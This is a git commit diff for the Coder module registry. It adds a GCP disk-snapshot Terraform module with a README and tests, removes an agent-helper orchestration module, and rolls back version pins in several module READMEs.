fix: simplify to single snapshot per workspace

- Remove rotating slots, use single snapshot
- Snapshot name: {owner}-{workspace}-snapshot
- Overwrites on each workspace stop
- Remove snapshot_retention_count variable
- Simpler user choice: restore or fresh

registry/coder-labs/modules/codex/README.md

@@ -13,7 +13,7 @@ Run Codex CLI in your workspace to access OpenAI's models through the Codex inte
 ```tf
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.1"
+  version        = "4.1.0"
   agent_id       = coder_agent.example.id
   openai_api_key = var.openai_api_key
   workdir        = "/home/coder/project"
@@ -32,7 +32,7 @@ module "codex" {
 module "codex" {
   count          = data.coder_workspace.me.start_count
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.1"
+  version        = "4.1.0"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   workdir        = "/home/coder/project"
@@ -51,7 +51,7 @@ For tasks integration with AI Bridge, add `enable_aibridge = true` to the [Usage
 ```tf
 module "codex" {
   source          = "registry.coder.com/coder-labs/codex/coder"
-  version         = "4.1.1"
+  version         = "4.1.0"
   agent_id        = coder_agent.example.id
   workdir         = "/home/coder/project"
   enable_aibridge = true
@@ -94,7 +94,7 @@ data "coder_task" "me" {}
 
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.1"
+  version        = "4.1.0"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   ai_prompt      = data.coder_task.me.prompt
@@ -112,7 +112,7 @@ This example shows additional configuration options for custom models, MCP serve
 ```tf
 module "codex" {
   source         = "registry.coder.com/coder-labs/codex/coder"
-  version        = "4.1.1"
+  version        = "4.1.0"
   agent_id       = coder_agent.example.id
   openai_api_key = "..."
   workdir        = "/home/coder/project"

registry/coder-labs/modules/codex/main.tf

@@ -131,7 +131,7 @@ variable "install_agentapi" {
 variable "agentapi_version" {
   type        = string
   description = "The version of AgentAPI to install."
-  default     = "v0.11.8"
+  default     = "v0.11.6"
 }
 
 variable "codex_model" {

registry/coder-labs/modules/gcp-disk-snapshot/README.md

@@ -0,0 +1,100 @@
+---
+display_name: GCP Disk Snapshot
+description: Create and manage disk snapshots for Coder workspaces on GCP
+icon: ../../../../.icons/gcp.svg
+verified: false
+tags: [gcp, snapshot, disk, backup, persistence]
+---
+
+# GCP Disk Snapshot Module
+
+This module provides disk snapshot functionality for Coder workspaces running on GCP Compute Engine. It automatically creates a snapshot when workspaces are stopped and allows users to restore from the snapshot when starting.
+
+```tf
+module "disk_snapshot" {
+  source  = "registry.coder.com/coder-labs/gcp-disk-snapshot/coder"
+  version = "1.0.0"
+
+  disk_self_link = google_compute_disk.workspace.self_link
+  default_image  = "debian-cloud/debian-12"
+  zone           = var.zone
+  project        = var.project_id
+}
+```
+
+## Features
+
+- **Automatic Snapshots**: Creates a disk snapshot when workspaces are stopped
+- **Single Snapshot**: Maintains one snapshot per workspace (overwrites on each stop)
+- **Restore Option**: Users can choose to restore from snapshot or start fresh
+- **Default to Restore**: Automatically selects restore if a snapshot exists
+- **Pure Terraform**: No external CLI dependencies
+- **Workspace Isolation**: Snapshots are named and labeled by workspace and owner
+
+## Usage
+
+### Basic Usage
+
+```hcl
+module "disk_snapshot" {
+  source = "registry.coder.com/coder-labs/gcp-disk-snapshot/coder"
+
+  disk_self_link = google_compute_disk.workspace.self_link
+  default_image  = "debian-cloud/debian-12"
+  zone           = var.zone
+  project        = var.project_id
+}
+
+# Create disk from snapshot or default image
+resource "google_compute_disk" "workspace" {
+  name = "workspace-${data.coder_workspace.me.id}"
+  type = "pd-balanced"
+  zone = var.zone
+  size = 50
+
+  # Use snapshot if available, otherwise use default image
+  snapshot = module.disk_snapshot.snapshot_self_link
+  image    = module.disk_snapshot.use_snapshot ? null : module.disk_snapshot.default_image
+
+  lifecycle {
+    ignore_changes = [snapshot, image]
+  }
+}
+```
+
+### With Regional Storage
+
+```hcl
+module "disk_snapshot" {
+  source = "registry.coder.com/coder-labs/gcp-disk-snapshot/coder"
+
+  disk_self_link    = google_compute_disk.workspace.self_link
+  default_image     = "debian-cloud/debian-12"
+  zone              = var.zone
+  project           = var.project_id
+  storage_locations = ["us-central1"] # Store snapshot in specific region
+
+  labels = {
+    environment = "development"
+    team        = "engineering"
+  }
+}
+```
+
+## How It Works
+
+1. When a workspace stops, a snapshot is created with a predictable name: `{owner}-{workspace}-snapshot`
+2. The snapshot is overwritten each time the workspace stops
+3. When starting, users can choose to restore from the snapshot or start fresh
+4. If a snapshot exists, restore is selected by default
+
+## Required IAM Permissions
+
+The service account running Terraform needs:
+
+- `compute.snapshots.create`
+- `compute.snapshots.delete`
+- `compute.snapshots.get`
+- `compute.disks.createSnapshot`
+
+Or use the predefined role: `roles/compute.storageAdmin`

registry/coder-labs/modules/gcp-disk-snapshot/main.test.ts

@@ -0,0 +1,80 @@
+import { describe, expect, it } from "bun:test";
+import { runTerraformApply, runTerraformInit } from "~test";
+
+describe("gcp-disk-snapshot", async () => {
+  await runTerraformInit(import.meta.dir);
+
+  it("required variables with test mode", async () => {
+    await runTerraformApply(import.meta.dir, {
+      disk_self_link:
+        "projects/test-project/zones/us-central1-a/disks/test-disk",
+      default_image: "debian-cloud/debian-12",
+      zone: "us-central1-a",
+      project: "test-project",
+      test_mode: true,
+    });
+  });
+
+  it("missing variable: disk_self_link", async () => {
+    await expect(
+      runTerraformApply(import.meta.dir, {
+        default_image: "debian-cloud/debian-12",
+        zone: "us-central1-a",
+        project: "test-project",
+        test_mode: true,
+      }),
+    ).rejects.toThrow();
+  });
+
+  it("missing variable: default_image", async () => {
+    await expect(
+      runTerraformApply(import.meta.dir, {
+        disk_self_link:
+          "projects/test-project/zones/us-central1-a/disks/test-disk",
+        zone: "us-central1-a",
+        project: "test-project",
+        test_mode: true,
+      }),
+    ).rejects.toThrow();
+  });
+
+  it("missing variable: zone", async () => {
+    await expect(
+      runTerraformApply(import.meta.dir, {
+        disk_self_link:
+          "projects/test-project/zones/us-central1-a/disks/test-disk",
+        default_image: "debian-cloud/debian-12",
+        project: "test-project",
+        test_mode: true,
+      }),
+    ).rejects.toThrow();
+  });
+
+  it("missing variable: project", async () => {
+    await expect(
+      runTerraformApply(import.meta.dir, {
+        disk_self_link:
+          "projects/test-project/zones/us-central1-a/disks/test-disk",
+        default_image: "debian-cloud/debian-12",
+        zone: "us-central1-a",
+        test_mode: true,
+      }),
+    ).rejects.toThrow();
+  });
+
+  it("supports optional variables", async () => {
+    await runTerraformApply(import.meta.dir, {
+      disk_self_link:
+        "projects/test-project/zones/us-central1-a/disks/test-disk",
+      default_image: "debian-cloud/debian-12",
+      zone: "us-central1-a",
+      project: "test-project",
+      test_mode: true,
+      storage_locations: JSON.stringify(["us-central1"]),
+      labels: JSON.stringify({
+        environment: "test",
+        team: "engineering",
+      }),
+    });
+  });
+});

registry/coder-labs/modules/gcp-disk-snapshot/main.tf

@@ -0,0 +1,178 @@
+terraform {
+  required_version = ">= 1.0"
+
+  required_providers {
+    google = {
+      source  = "hashicorp/google"
+      version = ">= 4.0"
+    }
+    coder = {
+      source  = "coder/coder"
+      version = ">= 0.17"
+    }
+  }
+}
+
+# Provider configuration for testing only
+# In production, the provider will be inherited from the calling module
+provider "google" {
+  project = "test-project"
+  region  = "us-central1"
+
+  # Fake credentials for testing - allows terraform plan/apply to run
+  # without actual GCP authentication in CI environments
+  credentials = jsonencode({
+    type                        = "service_account"
+    project_id                  = "test-project"
+    private_key_id              = "key-id"
+    private_key                 = "-----BEGIN RSA PRIVATE KEY-----\nMIIEowIBAAKCAQEA0Z3VS5JJcds3xfn/ygWyF8PbnGy0ARL00FVaKUOclBo0vo9C\nWL23EQJ2dWLV5g8k8DjFYIrXvARQPIDs0d+6UgKNKFjHmcZrj9i+e9v8zhVLB2wc\nfU2xsf3AJzLWr7L/LN6GEfT6m7kqKvBB6mJhpFn9RSAZ6WNvnOv1IVVQEq5Tfjlw\nGiJI0q0T8JmEobVSAaRJa7ZKQH1tBjTxcbr+EajVh5F2n7E0VqJNVNT5c5s8MJW0\nrn6AKaEVwmr3SW/NKQX6LxHRgVLJoWcL9j9B9cQ5Mz7u6h/oTrKLLt1v5NKvO9d8\ng39z7cKd1O6kd8nE3hZD7w5d0ileH9u9wZNPFwIDAQABAoIBADvhw8GIB0/G7mFP\ntest-fake-key-data-for-ci-testing-only\n-----END RSA PRIVATE KEY-----\n"
+    client_email                = "test@test-project.iam.gserviceaccount.com"
+    client_id                   = "123456789"
+    auth_uri                    = "https://accounts.google.com/o/oauth2/auth"
+    token_uri                   = "https://oauth2.googleapis.com/token"
+    auth_provider_x509_cert_url = "https://www.googleapis.com/oauth2/v1/certs"
+    client_x509_cert_url        = "https://www.googleapis.com/robot/v1/metadata/x509/test%40test-project.iam.gserviceaccount.com"
+  })
+}
+
+# Variables
+variable "test_mode" {
+  description = "Set to true when running tests to skip GCP API calls"
+  type        = bool
+  default     = false
+}
+
+variable "disk_self_link" {
+  description = "The self_link of the disk to create snapshots from"
+  type        = string
+}
+
+variable "default_image" {
+  description = "The default image to use when not restoring from a snapshot (e.g., debian-cloud/debian-12)"
+  type        = string
+}
+
+variable "zone" {
+  description = "The zone where the disk resides"
+  type        = string
+}
+
+variable "project" {
+  description = "The GCP project ID"
+  type        = string
+}
+
+variable "labels" {
+  description = "Additional labels to apply to snapshots"
+  type        = map(string)
+  default     = {}
+}
+
+variable "storage_locations" {
+  description = "Cloud Storage bucket location to store the snapshot (regional or multi-regional)"
+  type        = list(string)
+  default     = []
+}
+
+# Get workspace information
+data "coder_workspace" "me" {}
+data "coder_workspace_owner" "me" {}
+
+# Locals for label normalization (GCP labels must be lowercase with hyphens/underscores)
+locals {
+  normalized_workspace_name = lower(replace(replace(data.coder_workspace.me.name, "/[^a-z0-9-_]/", "-"), "--", "-"))
+  normalized_owner_name     = lower(replace(replace(data.coder_workspace_owner.me.name, "/[^a-z0-9-_]/", "-"), "--", "-"))
+  normalized_template_name  = lower(replace(replace(data.coder_workspace.me.template_name, "/[^a-z0-9-_]/", "-"), "--", "-"))
+
+  # Single snapshot name per workspace
+  snapshot_name = "${local.normalized_owner_name}-${local.normalized_workspace_name}-snapshot"
+}
+
+# Try to read existing snapshot for this workspace
+data "google_compute_snapshot" "workspace_snapshot" {
+  count   = var.test_mode ? 0 : 1
+  name    = local.snapshot_name
+  project = var.project
+}
+
+locals {
+  # Check if snapshot exists
+  snapshot_exists = var.test_mode ? false : can(data.google_compute_snapshot.workspace_snapshot[0].self_link)
+
+  # Default to using snapshot if it exists
+  default_restore = local.snapshot_exists ? "snapshot" : "none"
+}
+
+# Parameter to choose whether to restore from snapshot
+data "coder_parameter" "restore_snapshot" {
+  name         = "restore_snapshot"
+  display_name = "Restore from Snapshot"
+  description  = "Restore workspace from the last snapshot, or start fresh."
+  type         = "string"
+  default      = local.default_restore
+  mutable      = true
+  order        = 1
+
+  option {
+    name        = "Fresh disk (no snapshot)"
+    value       = "none"
+    description = "Start with a fresh disk using the default image"
+  }
+
+  dynamic "option" {
+    for_each = local.snapshot_exists ? [1] : []
+    content {
+      name        = "Restore from snapshot"
+      value       = "snapshot"
+      description = "Restore from: ${local.snapshot_name}"
+    }
+  }
+}
+
+locals {
+  use_snapshot = data.coder_parameter.restore_snapshot.value == "snapshot" && local.snapshot_exists
+}
+
+# Create/update snapshot when workspace is stopped
+resource "google_compute_snapshot" "workspace_snapshot" {
+  count       = !var.test_mode && data.coder_workspace.me.transition == "stop" ? 1 : 0
+  name        = local.snapshot_name
+  source_disk = var.disk_self_link
+  zone        = var.zone
+  project     = var.project
+
+  storage_locations = length(var.storage_locations) > 0 ? var.storage_locations : null
+
+  labels = merge(var.labels, {
+    coder_workspace = local.normalized_workspace_name
+    coder_owner     = local.normalized_owner_name
+    coder_template  = local.normalized_template_name
+    workspace_id    = data.coder_workspace.me.id
+  })
+}
+
+# Outputs
+output "snapshot_self_link" {
+  description = "The self_link of the snapshot to restore from (null if not using snapshot)"
+  value       = local.use_snapshot ? data.google_compute_snapshot.workspace_snapshot[0].self_link : null
+}
+
+output "use_snapshot" {
+  description = "Whether a snapshot is being used"
+  value       = local.use_snapshot
+}
+
+output "default_image" {
+  description = "The default image to use when not using a snapshot"
+  value       = var.default_image
+}
+
+output "snapshot_name" {
+  description = "The name of the workspace snapshot"
+  value       = local.snapshot_name
+}
+
+output "snapshot_exists" {
+  description = "Whether a snapshot exists for this workspace"
+  value       = local.snapshot_exists
+}

registry/coder-labs/modules/nextflow/README.md

@@ -10,6 +10,8 @@ tags: [nextflow, workflow, hpc, bioinformatics]
 
 A module that adds Nextflow to your Coder template.
 
+![Nextflow](../../.images/nextflow.png)
+
 ```tf
 module "nextflow" {
   count    = data.coder_workspace.me.start_count

registry/coder/modules/agent-helper/README.md

@@ -1,65 +0,0 @@
----
-display_name: Agent Helper
-description: Building block for modules that need orchestrated script execution
-icon: ../../../../.icons/coder.svg
-verified: false
-tags: [internal, library]
----
-
-# Agent Helper
-
-> [!CAUTION]
-> We do not recommend using this module directly. It is intended primarily for internal use by Coder to create modules with orchestrated script execution.
-
-The Agent Helper module is a building block for modules that need to run multiple scripts in a specific order. It uses `coder exp sync` for dependency management and is designed for orchestrating pre-install, install, post-install, and start scripts.
-
-> [!NOTE]
->
-> - The `agent_name` should be the same as that of the agentapi module's `agent_name` if used together.
-
-```tf
-module "agent_helper" {
-  source  = "registry.coder.com/coder/agent-helper/coder"
-  version = "1.0.0"
-
-  agent_id        = coder_agent.main.id
-  agent_name      = "myagent"
-  module_dir_name = ".my-module"
-
-  pre_install_script = <<-EOT
-    #!/bin/bash
-    echo "Running pre-install tasks..."
-    # Your pre-install logic here
-  EOT
-
-  install_script = <<-EOT
-    #!/bin/bash
-    echo "Installing dependencies..."
-    # Your install logic here
-  EOT
-
-  post_install_script = <<-EOT
-    #!/bin/bash
-    echo "Running post-install configuration..."
-    # Your post-install logic here
-  EOT
-
-  start_script = <<-EOT
-    #!/bin/bash
-    echo "Starting the application..."
-    # Your start logic here
-  EOT
-}
-```
-
-## Execution Order
-
-The module orchestrates scripts in the following order:
-
-1. **Log File Creation** - Creates module directory and log files
-2. **Pre-Install Script** (optional) - Runs before installation
-3. **Install Script** - Main installation
-4. **Post-Install Script** (optional) - Runs after installation
-5. **Start Script** - Starts the application
-
-Each script waits for its prerequisites to complete before running using `coder exp sync` dependency management.

registry/coder/modules/agent-helper/main.test.ts

@@ -1,13 +0,0 @@
-import { describe } from "bun:test";
-import { runTerraformInit, testRequiredVariables } from "~test";
-
-describe("agent-helper", async () => {
-  await runTerraformInit(import.meta.dir);
-
-  testRequiredVariables(import.meta.dir, {
-    agent_id: "test-agent-id",
-    agent_name: "test-agent",
-    module_dir_name: ".test-module",
-    start_script: "echo 'start'",
-  });
-});

registry/coder/modules/agent-helper/main.tf

@@ -1,190 +0,0 @@
-terraform {
-  required_version = ">= 1.0"
-
-  required_providers {
-    coder = {
-      source  = "coder/coder"
-      version = ">= 2.13"
-    }
-  }
-}
-
-variable "agent_id" {
-  type        = string
-  description = "The ID of a Coder agent."
-}
-
-data "coder_workspace" "me" {}
-
-data "coder_workspace_owner" "me" {}
-
-data "coder_task" "me" {}
-
-variable "pre_install_script" {
-  type        = string
-  description = "Custom script to run before installing the agent used by AgentAPI."
-  default     = null
-}
-
-variable "install_script" {
-  type        = string
-  description = "Script to install the agent used by AgentAPI."
-  default     = null
-}
-
-variable "post_install_script" {
-  type        = string
-  description = "Custom script to run after installing the agent used by AgentAPI."
-  default     = null
-}
-
-variable "start_script" {
-  type        = string
-  description = "Script that starts AgentAPI."
-}
-
-variable "agent_name" {
-  type        = string
-  description = "The name of the agent. This is used to construct unique script names for the experiment sync."
-
-}
-
-variable "module_dir_name" {
-  type        = string
-  description = "The name of the module directory."
-}
-
-locals {
-  encoded_pre_install_script  = var.pre_install_script != null ? base64encode(var.pre_install_script) : ""
-  encoded_install_script      = var.install_script != null ? base64encode(var.install_script) : ""
-  encoded_post_install_script = var.post_install_script != null ? base64encode(var.post_install_script) : ""
-  encoded_start_script        = base64encode(var.start_script)
-
-  pre_install_script_name  = "${var.agent_name}-pre_install_script"
-  install_script_name      = "${var.agent_name}-install_script"
-  post_install_script_name = "${var.agent_name}-post_install_script"
-  start_script_name        = "${var.agent_name}-start_script"
-
-  module_dir_path = "$HOME/${var.module_dir_name}"
-
-  pre_install_path  = "${local.module_dir_path}/pre_install.sh"
-  install_path      = "${local.module_dir_path}/install.sh"
-  post_install_path = "${local.module_dir_path}/post_install.sh"
-  start_path        = "${local.module_dir_path}/start.sh"
-
-  pre_install_log_path  = "${local.module_dir_path}/pre_install.log"
-  install_log_path      = "${local.module_dir_path}/install.log"
-  post_install_log_path = "${local.module_dir_path}/post_install.log"
-  start_log_path        = "${local.module_dir_path}/start.log"
-}
-
-resource "coder_script" "pre_install_script" {
-  count        = var.pre_install_script == null ? 0 : 1
-  agent_id     = var.agent_id
-  display_name = "Pre-Install Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    mkdir -p ${local.module_dir_path}
-
-    trap 'coder exp sync complete ${local.pre_install_script_name}' EXIT
-    coder exp sync start ${local.pre_install_script_name}
-
-    echo -n '${local.encoded_pre_install_script}' | base64 -d > ${local.pre_install_path}
-    chmod +x ${local.pre_install_path}
-
-    ${local.pre_install_path} > ${local.pre_install_log_path} 2>&1
-  EOT
-}
-
-resource "coder_script" "install_script" {
-  agent_id     = var.agent_id
-  display_name = "Install Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    mkdir -p ${local.module_dir_path}
-
-    trap 'coder exp sync complete ${local.install_script_name}' EXIT
-    %{if var.pre_install_script != null~}
-      coder exp sync want ${local.install_script_name} ${local.pre_install_script_name}
-    %{endif~}
-    coder exp sync start ${local.install_script_name}
-    echo -n '${local.encoded_install_script}' | base64 -d > ${local.install_path}
-    chmod +x ${local.install_path}
-
-    ${local.install_path} > ${local.install_log_path} 2>&1
-  EOT
-}
-
-resource "coder_script" "post_install_script" {
-  count        = var.post_install_script != null ? 1 : 0
-  agent_id     = var.agent_id
-  display_name = "Post-Install Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    trap 'coder exp sync complete ${local.post_install_script_name}' EXIT
-    coder exp sync want ${local.post_install_script_name} ${local.install_script_name}
-    coder exp sync start ${local.post_install_script_name}
-
-    echo -n '${local.encoded_post_install_script}' | base64 -d > ${local.post_install_path}
-    chmod +x ${local.post_install_path}
-
-    ${local.post_install_path} > ${local.post_install_log_path} 2>&1
-  EOT
-}
-
-resource "coder_script" "start_script" {
-  agent_id     = var.agent_id
-  display_name = "Start Script"
-  run_on_start = true
-  script       = <<-EOT
-    #!/bin/bash
-    set -o errexit
-    set -o pipefail
-
-    trap 'coder exp sync complete ${local.start_script_name}' EXIT
-
-    %{if var.post_install_script != null~}
-    coder exp sync want ${local.start_script_name} ${local.install_script_name} ${local.post_install_script_name}
-    %{else~}
-    coder exp sync want ${local.start_script_name} ${local.install_script_name}
-    %{endif~}
-    coder exp sync start ${local.start_script_name}
-
-    echo -n '${local.encoded_start_script}' | base64 -d > ${local.start_path}
-    chmod +x ${local.start_path}
-
-    ${local.start_path} > ${local.start_log_path} 2>&1
-  EOT
-}
-
-output "pre_install_script_name" {
-  description = "The name of the pre-install script for sync."
-  value       = local.pre_install_script_name
-}
-
-output "install_script_name" {
-  description = "The name of the install script for sync."
-  value       = local.install_script_name
-}
-
-output "post_install_script_name" {
-  description = "The name of the post-install script for sync."
-  value       = local.post_install_script_name
-}
-
-output "start_script_name" {
-  description = "The name of the start script for sync."
-  value       = local.start_script_name
-}

registry/coder/modules/agent-helper/main.tftest.hcl

@@ -1,271 +0,0 @@
-# Test for agent-helper module
-
-# Test with all scripts provided
-run "test_with_all_scripts" {
-  command = plan
-
-  variables {
-    agent_id            = "test-agent-id"
-    agent_name          = "test-agent"
-    module_dir_name     = ".test-module"
-    pre_install_script  = "echo 'pre-install'"
-    install_script      = "echo 'install'"
-    post_install_script = "echo 'post-install'"
-    start_script        = "echo 'start'"
-  }
-
-  # Verify pre_install_script is created when provided
-  assert {
-    condition     = length(coder_script.pre_install_script) == 1
-    error_message = "Pre-install script should be created when pre_install_script is provided"
-  }
-
-  assert {
-    condition     = coder_script.pre_install_script[0].agent_id == "test-agent-id"
-    error_message = "Pre-install script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.pre_install_script[0].display_name == "Pre-Install Script"
-    error_message = "Pre-install script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.pre_install_script[0].run_on_start == true
-    error_message = "Pre-install script should run on start"
-  }
-
-  # Verify install_script is created
-  assert {
-    condition     = coder_script.install_script.agent_id == "test-agent-id"
-    error_message = "Install script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.install_script.display_name == "Install Script"
-    error_message = "Install script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.install_script.run_on_start == true
-    error_message = "Install script should run on start"
-  }
-
-  # Verify post_install_script is created when provided
-  assert {
-    condition     = length(coder_script.post_install_script) == 1
-    error_message = "Post-install script should be created when post_install_script is provided"
-  }
-
-  assert {
-    condition     = coder_script.post_install_script[0].agent_id == "test-agent-id"
-    error_message = "Post-install script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.post_install_script[0].display_name == "Post-Install Script"
-    error_message = "Post-install script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.post_install_script[0].run_on_start == true
-    error_message = "Post-install script should run on start"
-  }
-
-  # Verify start_script is created
-  assert {
-    condition     = coder_script.start_script.agent_id == "test-agent-id"
-    error_message = "Start script agent ID should match input"
-  }
-
-  assert {
-    condition     = coder_script.start_script.display_name == "Start Script"
-    error_message = "Start script should have correct display name"
-  }
-
-  assert {
-    condition     = coder_script.start_script.run_on_start == true
-    error_message = "Start script should run on start"
-  }
-
-  # Verify outputs for script names
-  assert {
-    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
-    error_message = "Pre-install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.install_script_name == "test-agent-install_script"
-    error_message = "Install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.post_install_script_name == "test-agent-post_install_script"
-    error_message = "Post-install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.start_script_name == "test-agent-start_script"
-    error_message = "Start script name output should be correctly formatted"
-  }
-}
-
-# Test with only required scripts (no pre/post install)
-run "test_without_optional_scripts" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent-id"
-    agent_name      = "test-agent"
-    module_dir_name = ".test-module"
-    install_script  = "echo 'install'"
-    start_script    = "echo 'start'"
-  }
-
-  # Verify pre_install_script is NOT created when not provided
-  assert {
-    condition     = length(coder_script.pre_install_script) == 0
-    error_message = "Pre-install script should not be created when pre_install_script is null"
-  }
-
-  # Verify post_install_script is NOT created when not provided
-  assert {
-    condition     = length(coder_script.post_install_script) == 0
-    error_message = "Post-install script should not be created when post_install_script is null"
-  }
-
-  # Verify required scripts are still created
-  assert {
-    condition     = coder_script.install_script.agent_id == "test-agent-id"
-    error_message = "Install script should be created"
-  }
-
-  assert {
-    condition     = coder_script.start_script.agent_id == "test-agent-id"
-    error_message = "Start script should be created"
-  }
-
-  # Verify outputs
-  assert {
-    condition     = output.pre_install_script_name == "test-agent-pre_install_script"
-    error_message = "Pre-install script name output should be generated even when script is not created"
-  }
-
-  assert {
-    condition     = output.install_script_name == "test-agent-install_script"
-    error_message = "Install script name output should be correctly formatted"
-  }
-
-  assert {
-    condition     = output.post_install_script_name == "test-agent-post_install_script"
-    error_message = "Post-install script name output should be generated even when script is not created"
-  }
-
-  assert {
-    condition     = output.start_script_name == "test-agent-start_script"
-    error_message = "Start script name output should be correctly formatted"
-  }
-}
-
-# Test with mock data sources
-run "test_with_mock_data" {
-  command = plan
-
-  variables {
-    agent_id        = "mock-agent"
-    agent_name      = "mock-agent"
-    module_dir_name = ".mock-module"
-    install_script  = "echo 'install'"
-    start_script    = "echo 'start'"
-  }
-
-  # Mock the data sources for testing
-  override_data {
-    target = data.coder_workspace.me
-    values = {
-      id            = "test-workspace-id"
-      name          = "test-workspace"
-      owner         = "test-owner"
-      owner_id      = "test-owner-id"
-      template_id   = "test-template-id"
-      template_name = "test-template"
-      access_url    = "https://coder.example.com"
-      start_count   = 1
-      transition    = "start"
-    }
-  }
-
-  override_data {
-    target = data.coder_workspace_owner.me
-    values = {
-      id            = "test-owner-id"
-      email         = "test@example.com"
-      name          = "Test User"
-      session_token = "mock-token"
-    }
-  }
-
-  override_data {
-    target = data.coder_task.me
-    values = {
-      id = "test-task-id"
-    }
-  }
-
-  # Verify scripts are created with mocked data
-  assert {
-    condition     = coder_script.install_script.agent_id == "mock-agent"
-    error_message = "Install script should use the mocked agent ID"
-  }
-
-  assert {
-    condition     = coder_script.start_script.agent_id == "mock-agent"
-    error_message = "Start script should use the mocked agent ID"
-  }
-}
-
-# Test script naming with custom agent_name
-run "test_script_naming" {
-  command = plan
-
-  variables {
-    agent_id        = "test-agent"
-    agent_name      = "custom-name"
-    module_dir_name = ".test-module"
-    install_script  = "echo 'install'"
-    start_script    = "echo 'start'"
-  }
-
-  # Verify script names are constructed correctly
-  # The script should contain references to custom-name-* in the sync commands
-  assert {
-    condition     = can(regex("custom-name-install_script", coder_script.install_script.script))
-    error_message = "Install script should use custom agent_name in sync commands"
-  }
-
-  assert {
-    condition     = can(regex("custom-name-start_script", coder_script.start_script.script))
-    error_message = "Start script should use custom agent_name in sync commands"
-  }
-
-  # Verify outputs use custom agent_name
-  assert {
-    condition     = output.pre_install_script_name == "custom-name-pre_install_script"
-    error_message = "Pre-install script name output should use custom agent_name"
-  }
-
-  assert {
-    condition     = output.install_script_name == "custom-name-install_script"
-    error_message = "Install script name output should use custom agent_name"
-  }
-
-  assert {
-    condition     = output.post_install_script_name == "custom-name-post_install_script"
-    error_message = "Post-install script name output should use custom agent_name"
-  }
-
-  assert {
-    condition     = output.start_script_name == "custom-name-start_script"
-    error_message = "Start script name output should use custom agent_name"
-  }
-}

registry/coder/modules/agentapi/README.md

@@ -16,7 +16,7 @@ The AgentAPI module is a building block for modules that need to run an AgentAPI
 ```tf
 module "agentapi" {
   source  = "registry.coder.com/coder/agentapi/coder"
-  version = "2.1.1"
+  version = "2.1.0"
 
   agent_id             = var.agent_id
   web_app_slug         = local.app_slug

registry/coder/modules/agentapi/scripts/agentapi-wait-for-start.sh

@@ -3,22 +3,20 @@ set -o errexit
 set -o pipefail
 
 port=${1:-3284}
-max_attempts=150
 
-# This script waits for the agentapi server to start on the given port.
-# Each attempt sleeps 0.1s, so 150 attempts ≈ 15 seconds.
+# This script waits for the agentapi server to start on port 3284.
 # It considers the server started after 3 consecutive successful responses.
 
 agentapi_started=false
 
 echo "Waiting for agentapi server to start on port $port..."
-for i in $(seq 1 "$max_attempts"); do
+for i in $(seq 1 150); do
   for j in $(seq 1 3); do
     sleep 0.1
     if curl -fs -o /dev/null "http://localhost:$port/status"; then
       echo "agentapi response received ($j/3)"
     else
-      echo "agentapi server not responding ($i/$max_attempts)"
+      echo "agentapi server not responding ($i/15)"
       continue 2
     fi
   done
@@ -27,7 +25,7 @@ for i in $(seq 1 "$max_attempts"); do
 done
 
 if [ "$agentapi_started" != "true" ]; then
-  echo "Error: agentapi server did not start on port $port after $max_attempts attempts."
+  echo "Error: agentapi server did not start on port $port after 15 seconds."
   exit 1
 fi
 

registry/coder/modules/antigravity/README.md

@@ -16,7 +16,7 @@ Uses the [Coder Remote VS Code Extension](https://github.com/coder/vscode-coder)
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.1"
+  version  = "1.0.0"
   agent_id = coder_agent.example.id
 }
 ```
@@ -29,7 +29,7 @@ module "antigravity" {
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.1"
+  version  = "1.0.0"
   agent_id = coder_agent.example.id
   folder   = "/home/coder/project"
 }
@@ -45,7 +45,7 @@ The following example configures Antigravity to use the GitHub MCP server with a
 module "antigravity" {
   count    = data.coder_workspace.me.start_count
   source   = "registry.coder.com/coder/antigravity/coder"
-  version  = "1.0.1"
+  version  = "1.0.0"
   agent_id = coder_agent.example.id
   folder   = "/home/coder/project"
   mcp = jsonencode({

registry/coder/modules/antigravity/main.tf

@@ -66,15 +66,15 @@ locals {
 
 module "vscode-desktop-core" {
   source  = "registry.coder.com/coder/vscode-desktop-core/coder"
-  version = "1.0.2"
+  version = "1.0.1"
 
   agent_id = var.agent_id
 
-  coder_app_icon         = "/icon/antigravity.svg"
-  coder_app_slug         = var.slug
-  coder_app_display_name = var.display_name
-  coder_app_order        = var.order
-  coder_app_group        = var.group
+  web_app_icon         = "/icon/antigravity.svg"
+  web_app_slug         = var.slug
+  web_app_display_name = var.display_name
+  web_app_order        = var.order
+  web_app_group        = var.group
 
   folder      = var.folder
   open_recent = var.open_recent

registry/coder/modules/claude-code/README.md

@@ -13,7 +13,7 @@ Run the [Claude Code](https://docs.anthropic.com/en/docs/agents-and-tools/claude
 ```tf
 module "claude-code" {
   source         = "registry.coder.com/coder/claude-code/coder"
-  version        = "4.7.5"
+  version        = "4.7.4"
   agent_id       = coder_agent.main.id
   workdir        = "/home/coder/project"
   claude_api_key = "xxxx-xxxxx-xxxx"
@@ -47,7 +47,7 @@ By default, when `enable_boundary = true`, the module uses `coder boundary` subc
 ```tf
 module "claude-code" {
   source          = "registry.coder.com/coder/claude-code/coder"
